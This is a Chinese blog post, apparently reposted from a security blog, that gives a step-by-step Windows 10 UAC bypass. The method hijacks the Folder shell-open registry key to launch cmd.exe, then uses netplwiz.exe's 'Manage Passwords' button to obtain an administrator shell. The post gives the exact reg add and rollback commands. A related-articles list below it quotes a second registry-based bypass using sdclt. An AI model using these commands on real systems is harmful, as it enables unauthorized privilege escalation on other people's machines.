Windows 10 GUI UAC绕过(netplwiz.exe)

最新推荐文章于 2024-03-29 10:00:08 发布
原创 最新推荐文章于 2024-03-29 10:00:08 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #bypassUAC #windows #信息安全

本文介绍了一种在Windows10上通过修改注册表项实现GUIHack的方法,绕过UAC(User Account Control)进行管理员权限提升。具体操作涉及使用netplwiz.exe,并通过cmd获取AdministratorShell。

Windows 10 GUI UAC绕过(netplwiz.exe)

  • 类型:GUI Hack
  • 方法:注册表项操作
  • 目标:\system32\netplwiz.exe
  • 组件:攻击者定义
  • Works from: window 10

HKCU\Software\Classes\Folder\shell\open\command

单击netplwiz.exe中的“管理密码”按钮时调用

 

 

产生步骤:

运行命令

reg add “HKCU\Software\Classes\Folder\shell\open\command” /d “cmd.exe /c cmd.exe” /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v “DelegateExecute” /f

在cmd中运行netplwiz.exe。
选择“ 高级 ”选项卡,然后单击“ 管理密码 ”按钮。
然后您将获得Administrator Shell。

 

 

回滚

reg delete “HKCU\Software\Classes\Folder\shell\open\command” /f

转载请注明:Adminxe's Blog » Windows 10 GUI UAC绕过(netplwiz.exe)

 

Windows提权笔记-UAC绕过详解
墨痕诉清风的博客
03-12 830
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授权提升的访问权限。它将阻止安装程序和未经授权的应用程序在没有管理帐户权限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
使用EVENTVWR.EXE和注册表劫持实现“无文件”UAC绕过
chenyanxu的专栏
01-17 1158
在对Windows 10进行深入挖掘并发现了一个非常有趣的绕过用户帐户控制(UAC)的方法之后(详细信息请参阅https:/bypassing-uac-on-windows-10-using-disk-cleanup/),我决定花更多的时间来调查其他潜在的UAC绕过技术。目前,有一些开源的UAC绕过技术,其中大部分需要特权文件副本,然后使用IFileOperation COM对象或WUS...
Windows10 bypassUAC绕过用户账户控制
神棍之路
12-27 4469
使用这个github上的项目: https://github.com/L3cr0f/DccwBypassUAC 可以自行编译 测试:
使用BypassUAC:轻松绕过Windows用户账户控制
最新发布
gitblog_00086的博客
03-29 1177
使用BypassUAC:轻松绕过Windows用户账户控制 去发现同类优质开源项目:https://gitcode.com/ 是一个开源项目,旨在帮助开发者和安全研究人员在Windows操作系统中进行UAC(User Account Control)规避。该项目由Memoryo3o开发并维护,提供了一种技术手段,使得在不触发典型UAC警告的情况下执行高权限操作成为可能。 项目简介 在Windows...
Netplwiz.exe
11-28
Netplwiz
Windows系统缺失wpnapps.dll文件如何解决?
amio555的专栏
07-03 1785
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个wpnapps.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现wpnapps.dll丢失要怎么解决?
Win10开机免UAC自启动锐捷客户端
code12ab的博客
03-19 1485
需求分析: 尝试使用To desk进行远程开机,但是电脑开机需要使用锐捷联网来登录被控端To desk, 锐捷客户端需要手动UAC:如下图,无法满足要求。 全局方法: 关闭UAC功能 白名单: 将特定的程序添加到UAC的白名单中。 (1)microsoft回答篇,bilibili社区篇,这两个为一种方法;但是没有成功 (2)知乎文章:使用Win10自带的任务计划程序来避免UAC,使用任务计划程序来曲线绕过UAC,目前可行(如果自定义任务路径,则后面需要在添加的快捷方式中额外添加路径)。 ...
利用netplwiz.exe_Bypass_UAC1
08-03
标题 "利用netplwiz.exe_Bypass_UAC1" 描述了一个高级用户账户控制(User Account Control, UAC)的规避方法,通过Windows系统中的netplwiz.exe工具。这个方法涉及了对netplwiz.exe文件的特殊利用,该文件是Windows...
利用netplwiz.exe绕过UAC技巧解析
这篇资料主要讨论了如何利用netplwiz.exe工具来绕过Windows操作系统的用户账户控制(User Account Control, UAC)。用户账户控制是一种安全机制,旨在防止未经授权的更改系统设置或执行高权限操作,它要求管理员级别...
UAC快速管理工具.exe
06-25
UAC快速管理工具.exe
bypassUAC
火柴人的博客
05-17 333
https://www.anquanke.com/post/id/163222 我有个bypassUAC想给你讲
Windows Bypass UAC
angaoux03775的博客
03-22 365
Windows 10 sdclt UAC bypass @echo off reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f sdclt reg delete "HKCU\Software\Microsoft...
可以绕过 Windows UAC
langshanglibie的专栏
01-31 2104
Windows 系统安全机制并非固若金汤。通过 COM 提升名称方法,程序可以绕过其核心安全机制 UAC 而获取到系统管理员权限。
权限提升-Win系统权限提升篇&计算机用户&UAC绕过&DLL劫持&未引号路径
SuperherRo的博客
03-27 1349
1、计算机用户到System-入口点和应用点 2、计算机用户到System-UAC绕过&DLL劫持&未引号服务 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
新版Win10通过netplwiz设置自动登录时找不到“要使用本计算机,用户必须输入用户名和密码”选项的解决方法
namekong8的博客
12-07 7765
众所周知,Windows系统有个传统艺能,就是通过“netplwiz”或者“control userpasswords2”设置免密码自动登录。在设置自动登录时,需要取消勾选“要使用本计算机,用户必须输入用户名和密码”复选框,然后点击确定,即会弹出自动登录时使用的用户名和密码,输入所需要自动登录的账户和密码即可。经验证后发现,虚拟机所使用的是Win10 21H1版本的系统,该版本隐藏了这个复选框,从而无法设置自动登录。当然你也可以手动到注册表中修改,其原始值是2,改为0即可。
Win7系统提示找不到Netplwiz.exe文件的解决办法
file
03-06 801
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个Netplwiz.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现Netplwiz.exe丢失要怎么解决?
rundll32.exe命令使用大法
jackzhuo的专栏
09-15 1432
转自[url]http://bbs.360safe.com/viewthread.php?tid=1889&fpage=1&highlight=[/url]. Rundll32.exe是什么?顾名思意,“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Ru...
win7 怎么设置开机直接进入桌面? netplwiz 命令
weixin_34080903的博客
10-13 2157
电脑没设置密码,开机如何跳过帐户已锁定的界面,直接进入桌面呢? 1.单击【运行】,或按快捷键:win+r2.输入命令:netplwiz 单击【确定】3.单击你的登录账户4.去掉【要使用本机,用户名必须输入用户名和密码】前的【勾】,如下图所示:   5.设置完成后,单击【确定】6.弹出提示框,输入密码和确认密码,(如果没有密码直接留白,不用输入)输入完成后单击【确定】7.重启电脑就好了 ...
Netplwiz命令使用方法
famous_pengfei的博客
12-19 4072
NetplwizWindows操作系统中的一个命令行工具,用于管理网络连接和用户账户。通过使用Netplwiz命令,用户可以轻松地添加、删除、配置和管理网络连接,以及设置网络连接的属性。本文将分享Netplwiz命令的使用方法,帮助大家更好地掌握这个强大的工具,提高网络管理的效率和便捷性。无论您是系统管理员还是普通用户,相信本文都将为您提供有益的参考和指导。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值